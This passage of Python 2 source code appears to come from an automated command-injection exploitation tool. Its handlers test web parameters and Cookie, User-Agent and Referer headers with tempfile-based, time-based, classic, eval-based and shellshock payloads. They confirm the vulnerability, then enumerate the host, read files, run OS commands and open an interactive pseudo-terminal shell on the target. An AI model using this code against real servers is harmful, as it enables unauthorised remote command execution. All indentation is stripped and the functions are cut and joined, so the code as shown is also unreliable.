sys.stdout.write("\r")
sys.stdout.flush()
def tfb_injection_handler(url, delay, filename, tmp_path, http_request_method, url_time_response):
counter = 1
num_of_chars = 1
vp_flag = True
no_result = True
is_encoded = False
export_injection_info = False
injection_type = "Semiblind-based Command Injection"
technique = "tempfile-based injection technique"
# Check if defined "--maxlen" option.
if menu.options.maxlen:
maxlen = menu.options.maxlen
# Check if defined "--url-reload" option.
if menu.options.url_reload == True:
print Back.RED + "(x) Error: The '--url-reload' option is not available in "+ technique +"!" + Style.RESET_ALL
# Calculate all possible combinations
total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION))
for prefix in settings.PREFIXES:
for suffix in settings.SUFFIXES:
for separator in settings.SEPARATORS:
num_of_chars = num_of_chars + 1
# Check for bad combination of prefix and separator
combination = prefix + separator
if combination in settings.JUNK_COMBINATION:
prefix = ""
# Change TAG on every request to prevent false-positive resutls.
TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6))
# The output file for file-based injection technique.
OUTPUT_TEXTFILE = tmp_path + TAG + ".txt"
alter_shell = menu.options.alter_shell
tag_length = len(TAG) + 4
for output_length in range(1, int(tag_length)):
try:
# Tempfile-based decision payload (check if host is vulnerable).
if alter_shell :
payload = tfb_payloads.decision_alter_shell(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)
else:
payload = tfb_payloads.decision(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL)
# Cookie Injection
if settings.COOKIE_INJECTION == True:
# Check if target host is vulnerable to cookie injection.
vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
how_long = tfb_injector.cookie_injection_test(url, vuln_parameter, payload)
# User-Agent Injection
elif settings.USER_AGENT_INJECTION == True:
# Check if target host is vulnerable to user-agent injection.
vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
how_long = tfb_injector.user_agent_injection_test(url, vuln_parameter, payload)
# Referer Injection
elif settings.REFERER_INJECTION == True:
# Check if target host is vulnerable to referer injection.
vuln_parameter = parameters.specify_referer_parameter(menu.options.referer)
how_long = tfb_injector.referer_injection_test(url, vuln_parameter, payload)
else:
# Check if target host is vulnerable.
how_long, vuln_parameter = tfb_injector.injection_test(payload, http_request_method, url)
# Injection percentage calculation
percent = ((num_of_chars * 100) / total)
if percent == 100 and no_result == True:
if not menu.options.verbose:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
percent = ""
else:
if (url_time_response <= 1 and how_long >= delay) or \
(url_time_response >= 2 and how_long > delay):
# Time relative false positive fixation.
randv1 = random.randrange(0, 1)
randv2 = random.randrange(1, 2)
randvcalc = randv1 + randv2
cmd = "echo $((" + str(randv1) + "+" + str(randv2) + "))"
output = tfb_injector.false_positive_check(separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, randvcalc, alter_shell)
if str(output) == str(randvcalc):
if not menu.options.verbose:
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
else:
percent = ""
else:
break
else:
percent = str(percent)+"%"
if not menu.options.verbose:
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
except KeyboardInterrupt:
raise
except:
percent = ((num_of_chars * 100) / total)
if percent == 100:
if no_result == True:
if not menu.options.verbose:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
else:
percent = ""
break
else:
percent = str(percent)+"%"
#Print logs notification message
percent = Fore.BLUE + "FINISHED" + Style.RESET_ALL
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
print ""
logs.logs_notification(filename)
raise
else:
percent = str(percent)+"%"
break
# Yaw, got shellz!
# Do some magic tricks!
if (url_time_response <= 1 and how_long >= delay) or \
(url_time_response >= 2 and how_long > delay) :
if len(TAG) == output_length:
found = True
no_result = False
if settings.COOKIE_INJECTION == True:
header_name = " Cookie"
found_vuln_parameter = vuln_parameter
the_type = " HTTP header"
elif settings.USER_AGENT_INJECTION == True:
header_name = " User-Agent"
found_vuln_parameter = ""
the_type = " HTTP header"
elif settings.REFERER_INJECTION == True:
header_name = " Referer"
found_vuln_parameter = ""
the_type = " HTTP header"
else:
header_name = ""
the_type = " parameter"
if http_request_method == "GET":
found_vuln_parameter = parameters.vuln_GET_param(url)
else :
found_vuln_parameter = vuln_parameter
if len(found_vuln_parameter) != 0 :
found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'"
# Print the findings to log file.
if export_injection_info == False:
export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
if vp_flag == True:
vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload)
logs.upload_payload(filename, counter, payload)
counter = counter + 1
# Print the findings to terminal.
print Style.BRIGHT + "\n(!) The ("+ http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to "+ injection_type + "." + Style.RESET_ALL
print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload.replace("\n", "\\n")) + Style.RESET_ALL
# Check for any enumeration options.
tfb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
# Check for any enumeration options.
tfb_file_access.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
# Check if defined single cmd.
if menu.options.os_cmd:
tfb_enumeration.single_os_cmd_exec(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
# Pseudo-Terminal shell
go_back = False
while True:
if go_back == True:
break
gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type '?' for shell options)"
while True:
try:
cmd = raw_input("Shell > ")
if cmd.lower() in settings.SHELL_OPTIONS:
if cmd == "?":
menu.shell_options()
continue
elif cmd.lower() == "quit":
logs.logs_notification(filename)
sys.exit(0)
elif cmd.lower() == "back":
go_back = True
break
else:
pass
else:
# The main command injection exploitation.
check_how_long, output = tfb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
if menu.options.verbose:
print ""
if output != "" and check_how_long != 0 :
print "\n\n" + Fore.GREEN + Style.BRIGHT + output + Style.RESET_ALL
print "\n(*) Finished in "+ time.strftime('%H:%M:%S', time.gmtime(check_how_long)) +".\n"
else:
print "\n" + Back.RED + "(x) Error: The '" + cmd + "' command, does not return any output." + Style.RESET_ALL + "\n"
except KeyboardInterrupt:
raise
elif gotshell in settings.CHOISE_NO:
if menu.options.verbose:
sys.stdout.write("\r(*) Continue testing the "+ technique +"... ")
sys.stdout.flush()
break
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
pass
break
if no_result == True:
print ""
return False
else :
sys.stdout.write("\r")
sys.stdout.flush()
def cb_injection_handler(url, delay, filename, http_request_method):
counter = 1
vp_flag = True
no_result = True
is_encoded = False
export_injection_info = False
injection_type = "Results-based Command Injection"
technique = "classic injection technique"
sys.stdout.write("(*) Testing the " + technique + "... ")
sys.stdout.flush()
i = 0
# Calculate all possible combinations
total = len(settings.WHITESPACES) * len(settings.PREFIXES) * len(
settings.SEPARATORS) * len(settings.SUFFIXES)
for whitespace in settings.WHITESPACES:
for prefix in settings.PREFIXES:
for suffix in settings.SUFFIXES:
for separator in settings.SEPARATORS:
i = i + 1
# Check for bad combination of prefix and separator
combination = prefix + separator
if combination in settings.JUNK_COMBINATION:
prefix = ""
# Change TAG on every request to prevent false-positive results.
TAG = ''.join(
random.choice(string.ascii_uppercase)
for i in range(6))
randv1 = random.randrange(100)
randv2 = random.randrange(100)
randvcalc = randv1 + randv2
# Define alter shell
alter_shell = menu.options.alter_shell
try:
if alter_shell:
# Classic -alter shell- decision payload (check if host is vulnerable).
payload = cb_payloads.decision_alter_shell(
separator, TAG, randv1, randv2)
else:
# Classic decision payload (check if host is vulnerable).
payload = cb_payloads.decision(
separator, TAG, randv1, randv2)
# Define prefixes & suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
if menu.options.base64:
payload = urllib.unquote(payload)
payload = base64.b64encode(payload)
else:
if separator == " ":
payload = re.sub(" ", "%20", payload)
else:
payload = re.sub(" ", whitespace, payload)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY +
"(~) Payload: " + payload +
Style.RESET_ALL)
# if need page reload
if menu.options.url_reload:
time.sleep(delay)
response = urllib.urlopen(url)
# Cookie Injection
if settings.COOKIE_INJECTION == True:
# Check if target host is vulnerable to cookie injection.
vuln_parameter = parameters.specify_cookie_parameter(
menu.options.cookie)
response = cb_injector.cookie_injection_test(
url, vuln_parameter, payload)
# User-Agent Injection
elif settings.USER_AGENT_INJECTION == True:
# Check if target host is vulnerable to user-agent injection.
vuln_parameter = parameters.specify_user_agent_parameter(
menu.options.agent)
response = cb_injector.user_agent_injection_test(
url, vuln_parameter, payload)
# Referer Injection
elif settings.REFERER_INJECTION == True:
# Check if target host is vulnerable to referer injection.
vuln_parameter = parameters.specify_referer_parameter(
menu.options.referer)
response = cb_injector.referer_injection_test(
url, vuln_parameter, payload)
else:
# Check if target host is vulnerable.
response, vuln_parameter = cb_injector.injection_test(
payload, http_request_method, url)
# Evaluate test results.
shell = cb_injector.injection_test_results(
response, TAG, randvcalc)
if not menu.options.verbose:
percent = ((i * 100) / total)
float_percent = "{0:.1f}".format(
round(((i * 100) / (total * 1.0)), 2))
if percent == 100:
if no_result == True:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
percent = str(float_percent) + "%"
elif len(shell) != 0:
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
else:
percent = str(float_percent) + "%"
sys.stdout.write("\r(*) Testing the " + technique +
"... " + "[ " + percent + " ]")
sys.stdout.flush()
except KeyboardInterrupt:
raise
except:
continue
# Yaw, got shellz!
# Do some magic tricks!
if shell:
found = True
no_result = False
if settings.COOKIE_INJECTION == True:
header_name = " Cookie"
found_vuln_parameter = vuln_parameter
the_type = " HTTP header"
elif settings.USER_AGENT_INJECTION == True:
header_name = " User-Agent"
found_vuln_parameter = ""
the_type = " HTTP header"
elif settings.REFERER_INJECTION == True:
header_name = " Referer"
found_vuln_parameter = ""
the_type = " HTTP header"
else:
header_name = ""
the_type = " parameter"
if http_request_method == "GET":
found_vuln_parameter = parameters.vuln_GET_param(
url)
else:
found_vuln_parameter = vuln_parameter
if len(found_vuln_parameter) != 0:
found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'"
# Print the findings to log file.
if export_injection_info == False:
export_injection_info = logs.add_type_and_technique(
export_injection_info, filename,
injection_type, technique)
if vp_flag == True:
vp_flag = logs.add_parameter(
vp_flag, filename, http_request_method,
vuln_parameter, payload)
logs.update_payload(filename, counter, payload)
counter = counter + 1
# Print the findings to terminal.
print Style.BRIGHT + "\n(!) The (" + http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to " + injection_type + "." + Style.RESET_ALL
print " (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
print " (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title(
) + Style.RESET_ALL + ""
print " (+) Payload : " + Fore.YELLOW + Style.BRIGHT + re.sub(
"%20", " ", re.sub("%2B", "+",
payload)) + Style.RESET_ALL
# Check for any enumeration options.
if settings.ENUMERATION_DONE == True:
while True:
enumerate_again = raw_input(
"\n(?) Do you want to enumerate again? [Y/n/q] > "
).lower()
if enumerate_again in settings.CHOISE_YES:
cb_enumeration.do_check(
separator, TAG, prefix, suffix,
whitespace, http_request_method, url,
vuln_parameter, alter_shell, filename)
break
elif enumerate_again in settings.CHOISE_NO:
break
elif enumerate_again in settings.CHOISE_QUIT:
sys.exit(0)
else:
if enumerate_again == "":
enumerate_again = "enter"
print Back.RED + "(x) Error: '" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL
pass
else:
cb_enumeration.do_check(separator, TAG, prefix,
suffix, whitespace,
http_request_method, url,
vuln_parameter,
alter_shell, filename)
# Check for any system file access options.
if settings.FILE_ACCESS_DONE == True:
while True:
file_access_again = raw_input(
"(?) Do you want to access files again? [Y/n/q] > "
).lower()
if file_access_again in settings.CHOISE_YES:
if not menu.options.verbose:
print ""
cb_file_access.do_check(
separator, TAG, prefix, suffix,
whitespace, http_request_method, url,
vuln_parameter, alter_shell, filename)
break
elif file_access_again in settings.CHOISE_NO:
break
elif file_access_again in settings.CHOISE_QUIT:
sys.exit(0)
else:
if file_access_again == "":
file_access_again = "enter"
print Back.RED + "(x) Error: '" + file_access_again + "' is not a valid answer." + Style.RESET_ALL
pass
else:
cb_file_access.do_check(separator, TAG, prefix,
suffix, whitespace,
http_request_method, url,
vuln_parameter,
alter_shell, filename)
# Check if defined single cmd.
if menu.options.os_cmd:
cb_enumeration.single_os_cmd_exec(
separator, TAG, prefix, suffix, whitespace,
http_request_method, url, vuln_parameter,
alter_shell, filename)
# Pseudo-Terminal shell
go_back = False
while True:
if go_back == True:
break
gotshell = raw_input(
"(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > "
).lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type '?' for shell options)"
while True:
try:
cmd = raw_input("Shell > ")
if cmd.lower(
) in settings.SHELL_OPTIONS:
if cmd.lower() == "?":
menu.shell_options()
elif cmd.lower() == "quit":
sys.exit(0)
elif cmd.lower() == "back":
go_back = True
if checks.check_next_attack_vector(
technique,
go_back) == True:
break
else:
if no_result == True:
return False
else:
return True
else:
pass
else:
# Command execution results.
response = cb_injector.injection(
separator, TAG, cmd, prefix,
suffix, whitespace,
http_request_method, url,
vuln_parameter, alter_shell,
filename)
# if need page reload
if menu.options.url_reload:
time.sleep(delay)
response = urllib.urlopen(url)
# Evaluate injection results.
shell = cb_injector.injection_results(
response, TAG)
if shell:
shell = "".join(
str(p) for p in shell)
html_parser = HTMLParser.HTMLParser(
)
shell = html_parser.unescape(
shell)
if shell != "":
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
else:
if menu.options.verbose:
print ""
print Back.RED + "(x) Error: The '" + cmd + "' command, does not return any output." + Style.RESET_ALL + "\n"
except KeyboardInterrupt:
raise
elif gotshell in settings.CHOISE_NO:
if checks.check_next_attack_vector(
technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
return True
elif gotshell in settings.CHOISE_QUIT:
sys.exit(0)
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
pass
if no_result == True:
print ""
return False
else:
sys.stdout.write("\r")
sys.stdout.flush()
def shellshock_handler(url, http_request_method, filename):
counter = 1
vp_flag = True
no_result = True
export_injection_info = False
injection_type = "results-based command injection"
technique = "shellshock injection technique"
sys.stdout.write("(*) Testing the "+ technique + "... ")
sys.stdout.flush()
try:
i = 0
total = len(shellshock_cves) * len(headers)
for cve in shellshock_cves:
for check_header in headers:
i = i + 1
attack_vector = "echo " + cve + ":Done;"
payload = shellshock_payloads(cve, attack_vector)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload + Style.RESET_ALL)
header = {check_header : payload}
request = urllib2.Request(url, None, header)
response = urllib2.urlopen(request)
if not menu.options.verbose:
percent = ((i*100)/total)
float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2))
if percent == 100:
if no_result == True:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
elif cve in response.info():
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
else:
percent = str(float_percent )+"%"
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
# Print the findings to log file.
if export_injection_info == False:
export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
if vp_flag == True:
vuln_parameter = "HTTP Header"
vp_flag = logs.add_parameter(vp_flag, filename, check_header, vuln_parameter, payload)
logs.upload_payload(filename, counter, payload)
if cve in response.info():
no_result = False
print Style.BRIGHT + "\n(!) The ("+ check_header + ") '" + Style.UNDERLINE + url + Style.RESET_ALL + Style.BRIGHT + "' is vulnerable to "+ injection_type +"."+ Style.RESET_ALL
print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type.title() + Style.RESET_ALL + ""
print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + "\"" + payload + "\"" + Style.RESET_ALL
# Enumeration options.
enumeration(url, cve, check_header)
# File access options.
file_access(url, cve, check_header)
if menu.options.os_cmd:
cmd = menu.options.os_cmd
shell = cmd_exec(url, cmd, cve, check_header)
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
sys.exit(0)
else:
# Pseudo-Terminal shell
go_back = False
while True:
if go_back == True:
break
gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type '?' for shell options)"
while True:
try:
cmd = raw_input("Shell > ")
if cmd.lower() in settings.SHELL_OPTIONS:
if cmd.lower() == "?":
menu.shell_options()
elif cmd.lower() == "quit":
sys.exit(0)
elif cmd.lower() == "back":
go_back = True
if checks.check_next_attack_vector(technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
return True
else:
pass
else:
shell = cmd_exec(url, cmd, cve, check_header)
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
except KeyboardInterrupt:
raise
except:
print ""
sys.exit(0)
elif gotshell in settings.CHOISE_NO:
if checks.check_next_attack_vector(technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
return True
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
continue
break
else:
continue
except urllib2.HTTPError, err:
print "\n" + Fore.YELLOW + "(^) Warning: " + str(err) + Style.RESET_ALL
def tb_injection_handler(url, delay, filename, http_request_method, url_time_response):
percent = 0
counter = 1
num_of_chars = 1
vp_flag = True
no_result = True
is_encoded = False
export_injection_info = False
injection_type = "Blind-based Command Injection"
technique = "time-based injection technique"
# Check if defined "--maxlen" option.
if menu.options.maxlen:
maxlen = settings.MAXLEN
# Check if defined "--url-reload" option.
if menu.options.url_reload == True:
print Fore.YELLOW + "(^) Warning: The '--url-reload' option is not available in "+ technique +"." + Style.RESET_ALL
percent = str(percent)+"%"
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
# Calculate all possible combinations
total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION))
for prefix in settings.PREFIXES:
for suffix in settings.SUFFIXES:
for separator in settings.SEPARATORS:
num_of_chars = num_of_chars + 1
# Check for bad combination of prefix and separator
combination = prefix + separator
if combination in settings.JUNK_COMBINATION:
prefix = ""
# Define alter shell
alter_shell = menu.options.alter_shell
# Change TAG on every request to prevent false-positive results.
TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6))
tag_length = len(TAG) + 4
for output_length in range(1, int(tag_length)):
try:
if alter_shell:
# Time-based decision payload (check if host is vulnerable).
payload = tb_payloads.decision_alter_shell(separator, TAG, output_length, delay, http_request_method)
else:
# Time-based decision payload (check if host is vulnerable).
payload = tb_payloads.decision(separator, TAG, output_length, delay, http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
if menu.options.base64:
payload = base64.b64encode(payload)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL)
# Cookie Injection
if settings.COOKIE_INJECTION == True:
# Check if target host is vulnerable to cookie injection.
vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
how_long = tb_injector.cookie_injection_test(url, vuln_parameter, payload)
# User-Agent Injection
elif settings.USER_AGENT_INJECTION == True:
# Check if target host is vulnerable to user-agent injection.
vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
how_long = tb_injector.user_agent_injection_test(url, vuln_parameter, payload)
# Referer Injection
elif settings.REFERER_INJECTION == True:
# Check if target host is vulnerable to referer injection.
vuln_parameter = parameters.specify_referer_parameter(menu.options.referer)
how_long = tb_injector.referer_injection_test(url, vuln_parameter, payload)
else:
# Check if target host is vulnerable.
how_long, vuln_parameter = tb_injector.injection_test(payload, http_request_method, url)
# Injection percentage calculation
percent = ((num_of_chars * 100) / total)
float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total * 1.0)),2))
if percent == 100 and no_result == True:
if not menu.options.verbose:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
percent = ""
else:
if (url_time_response <= 1 and how_long >= delay) or \
(url_time_response >= 2 and how_long > delay):
# Time relative false positive fixation.
if len(TAG) == output_length:
randv1 = random.randrange(0, 1)
randv2 = random.randrange(1, 2)
randvcalc = randv1 + randv2
cmd = "(" + str(randv1) + "+" + str(randv2) + ")"
# Check for false positive resutls
output = tb_injector.false_positive_check(separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, randvcalc, alter_shell)
if str(output) == str(randvcalc) and len(TAG) == output_length:
if not menu.options.verbose:
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
else:
percent = ""
else:
break
else:
percent = str(float_percent)+"%"
if not menu.options.verbose:
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
except KeyboardInterrupt:
raise
except:
break
# Yaw, got shellz!
# Do some magic tricks!
if (url_time_response <= 1 and how_long >= delay) or \
(url_time_response >= 2 and how_long > delay):
if len(TAG) == output_length :
found = True
no_result = False
if settings.COOKIE_INJECTION == True:
header_name = " Cookie"
found_vuln_parameter = vuln_parameter
the_type = " HTTP header"
elif settings.USER_AGENT_INJECTION == True:
header_name = " User-Agent"
found_vuln_parameter = ""
the_type = " HTTP header"
elif settings.REFERER_INJECTION == True:
header_name = " Referer"
found_vuln_parameter = ""
the_type = " HTTP header"
else:
header_name = ""
the_type = " parameter"
if http_request_method == "GET":
found_vuln_parameter = parameters.vuln_GET_param(url)
else :
found_vuln_parameter = vuln_parameter
if len(found_vuln_parameter) != 0 :
found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'"
# Print the findings to log file.
if export_injection_info == False:
export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
if vp_flag == True:
vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload)
logs.upload_payload(filename, counter, payload)
counter = counter + 1
# Print the findings to terminal.
print Style.BRIGHT + "\n(!) The ("+ http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to "+ injection_type + "." + Style.RESET_ALL
print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload.replace("\n", "\\n")) + Style.RESET_ALL
# Check for any enumeration options.
if settings.ENUMERATION_DONE == True :
while True:
enumerate_again = raw_input("\n(?) Do you want to enumerate again? [Y/n/q] > ").lower()
if enumerate_again in settings.CHOISE_YES:
tb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell)
break
elif enumerate_again in settings.CHOISE_NO:
break
elif enumerate_again in settings.CHOISE_QUIT:
sys.exit(0)
else:
if enumerate_again == "":
enumerate_again = "enter"
print Back.RED + "(x) Error: '" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL
pass
else:
tb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell)
# Check for any system file access options.
if settings.FILE_ACCESS_DONE == True :
while True:
file_access_again = raw_input("(?) Do you want to access files again? [Y/n/q] > ").lower()
if file_access_again in settings.CHOISE_YES:
print ""
tb_file_access.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell)
break
elif file_access_again in settings.CHOISE_NO:
break
elif file_access_again in settings.CHOISE_QUIT:
sys.exit(0)
else:
if file_access_again == "":
file_access_again = "enter"
print Back.RED + "(x) Error: '" + file_access_again + "' is not a valid answer." + Style.RESET_ALL
pass
else:
tb_file_access.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell)
# Check if defined single cmd.
if menu.options.os_cmd:
cmd = menu.options.os_cmd
check_how_long, output = tb_enumeration.single_os_cmd_exec(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell)
# Exploirt injection result
tb_injector.export_injection_results(cmd, separator, output, check_how_long)
sys.exit(0)
# Pseudo-Terminal shell
go_back = False
while True:
if go_back == True:
break
gotshell = raw_input("(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type '?' for shell options)"
while True:
try:
cmd = raw_input("Shell > ")
if cmd.lower() in settings.SHELL_OPTIONS:
if cmd == "?":
menu.shell_options()
continue
elif cmd.lower() == "quit":
sys.exit(0)
elif cmd.lower() == "back":
go_back = True
if checks.check_next_attack_vector(technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
return True
else:
pass
else:
# The main command injection exploitation.
check_how_long, output = tb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell)
# Exploirt injection result
tb_injector.export_injection_results(cmd, separator, output, check_how_long)
print ""
except KeyboardInterrupt:
raise
elif gotshell in settings.CHOISE_NO:
if checks.check_next_attack_vector(technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
return True
elif gotshell in settings.CHOISE_QUIT:
sys.exit(0)
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
pass
break
if no_result == True:
print ""
return False
else :
sys.stdout.write("\r")
sys.stdout.flush()
def eb_injection_handler(url, delay, filename, http_request_method):
counter = 1
vp_flag = True
no_result = True
export_injection_info = False
injection_type = "Results-based Command Injection"
technique = "eval-based injection technique"
sys.stdout.write("(*) Testing the "+ technique + "... ")
sys.stdout.flush()
i = 0
# Calculate all possible combinations
total = len(settings.EVAL_PREFIXES) * len(settings.EVAL_SEPARATORS) * len(settings.EVAL_SUFFIXES)
for prefix in settings.EVAL_PREFIXES:
for suffix in settings.EVAL_SUFFIXES:
for separator in settings.EVAL_SEPARATORS:
i = i + 1
# Check for bad combination of prefix and separator
combination = prefix + separator
if combination in settings.JUNK_COMBINATION:
prefix = ""
# Change TAG on every request to prevent false-positive results.
TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
randv1 = random.randrange(100)
randv2 = random.randrange(100)
randvcalc = randv1 + randv2
try:
# Eval-based decision payload (check if host is vulnerable).
payload = eb_payloads.decision(separator, TAG, randv1, randv2)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, urllib.quote(suffix))
payload = payload + "" + TAG + ""
payload = re.sub(" ", "%20", payload)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + payload + Style.RESET_ALL)
# Cookie Injection
if settings.COOKIE_INJECTION == True:
# Check if target host is vulnerable to cookie injection.
vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
response = eb_injector.cookie_injection_test(url, vuln_parameter, payload)
else:
found_cookie_injection = False
# Check if target host is vulnerable.
response, vuln_parameter = eb_injector.injection_test(payload, http_request_method, url)
# if need page reload
if menu.options.url_reload:
time.sleep(delay)
response = urllib.urlopen(url)
# Evaluate test results.
shell = eb_injector.injection_test_results(response, TAG, randvcalc)
if not menu.options.verbose:
percent = ((i*100)/total)
if percent == 100:
if no_result == True:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
percent = str(percent)+"%"
elif len(shell) != 0:
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
else:
percent = str(percent)+"%"
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
except KeyboardInterrupt:
raise
except:
continue
# Yaw, got shellz!
# Do some magic tricks!
if shell:
found = True
no_result = False
